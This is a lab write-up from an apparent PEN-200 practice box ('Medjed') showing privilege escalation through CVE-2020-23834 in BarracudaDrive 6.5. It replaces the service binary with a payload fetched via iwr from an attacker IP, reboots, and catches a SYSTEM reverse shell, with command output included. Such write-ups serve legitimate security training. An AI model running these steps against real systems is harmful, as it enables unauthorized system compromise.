CVE-2020-23834
The target BarracudaDrive instance has been identified to be vulnerable to CVE-2020-23834 due to its outdated version; 6.5
/Practice/Medjed/5-Privilege_Escalation/attachments/{905FC361-A501-4EFC-9ABC-6B32E2B8F062}.png)
A vulnerability classified as critical was found in Real Time Logic BarracudaDrive 6.5. Affected by this vulnerability is an unknown functionality of the file SYSTEMDRIVE%\bd\bd.exe of the component File Permission. The manipulation leads to privileges management. This vulnerability is known as CVE-2020-23834. Attacking locally is a requirement. There is no exploit available.
Exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/medjed]
└─$ searchsploit -m windows/local/48789.txt ; mv 48789.txt CVE-2020-23834.txt
Exploit: BarracudaDrive v6.5 - Insecure Folder Permissions
URL: https://www.exploit-db.com/exploits/48789
Path: /usr/share/exploitdb/exploits/windows/local/48789.txt
Codes: N/A
Verified: False
File Type: C source, ASCII text
Copied to: /home/kali/PEN-200/PG_PRACTICE/medjed/48789.txtExploit locally available
Exploitation
PS C:\bd> mv bd.exe bd.exe.bakChanging the service EXE to a new name; bd.exe.bak
PS C:\bd> iwr -Uri http://192.168.45.195/bd.exe -OutFile C:\bd\bd.exeTransferring the payload
PS C:\bd> shutdown /rRebooting the target system with the current user’s privileges
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/medjed]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.156.127] 49671
Windows PowerShell running as user MEDJED$ on MEDJED
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\WINDOWS\system32> whoami
nt authority\system
PS C:\WINDOWS\system32> hostname
medjed
PS C:\WINDOWS\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.156.127
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.156.254System level compromise